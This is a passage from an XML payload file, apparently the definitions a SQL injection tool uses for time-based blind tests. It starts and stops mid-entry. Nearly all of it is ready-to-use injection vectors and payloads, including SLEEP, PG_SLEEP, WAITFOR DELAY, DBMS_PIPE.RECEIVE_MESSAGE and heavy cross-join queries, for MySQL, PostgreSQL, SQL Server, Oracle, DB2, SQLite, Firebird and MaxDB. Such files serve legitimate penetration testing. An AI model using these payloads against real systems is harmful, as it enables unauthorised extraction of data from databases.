</response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL OR time-based blind (ELT - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>\n        <request>\n            <payload>OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL &gt; 8.1 AND time-based blind</title>\n        <stype>5</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n            <dbms_version>&gt; 8.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL &gt; 8.1 OR time-based blind</title>\n        <stype>5</stype>\n        <level>1</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n            <dbms_version>&gt; 8.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL &gt; 8.1 AND time-based blind (comment)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n            <dbms_version>&gt; 8.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL &gt; 8.1 OR time-based blind (comment)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n            <dbms_version>&gt; 8.1</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL AND time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>2</level>\n        <risk>2</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL OR time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>2</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL AND time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>PostgreSQL OR time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>PostgreSQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase time-based blind (IF)</title>\n        <stype>5</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>0</clause>\n        <where>1</where>\n        <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>\n        <request>\n            <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase time-based blind (IF - comment)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>0</clause>\n        <where>1</where>\n        <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>\n        <request>\n            <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>2</level>\n        <risk>2</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>2</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Microsoft SQL Server</dbms>\n            <dbms>Sybase</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle AND time-based blind</title>\n        <stype>5</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle OR time-based blind</title>\n        <stype>5</stype>\n        <level>1</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle AND time-based blind (comment)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle OR time-based blind (comment)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle AND time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>2</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle OR time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>2</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle AND time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle OR time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>IBM DB2 AND time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>IBM DB2</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>IBM DB2 OR time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>IBM DB2</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>IBM DB2 AND time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>IBM DB2</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>IBM DB2 OR time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>IBM DB2</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>SQLite &gt; 2.0 AND time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>2</risk>\n        <clause>1,8,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>SQLite</dbms>\n            <dbms_version>&gt; 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>SQLite &gt; 2.0 OR time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>SQLite</dbms>\n            <dbms_version>&gt; 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>SQLite &gt; 2.0 AND time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>SQLite</dbms>\n            <dbms_version>&gt; 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>SQLite &gt; 2.0 OR time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>SQLite</dbms>\n            <dbms_version>&gt; 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>Firebird &gt;= 2.0 AND time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Firebird</dbms>\n            <dbms_version>&gt;= 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>Firebird &gt;= 2.0 OR time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Firebird</dbms>\n            <dbms_version>&gt;= 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>Firebird &gt;= 2.0 AND time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Firebird</dbms>\n            <dbms_version>&gt;= 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>Firebird &gt;= 2.0 OR time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Firebird</dbms>\n            <dbms_version>&gt;= 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>SAP MaxDB AND time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>SAP MaxDB</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>SAP MaxDB OR time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>SAP MaxDB</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>SAP MaxDB AND time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>SAP MaxDB</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>SAP MaxDB OR time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        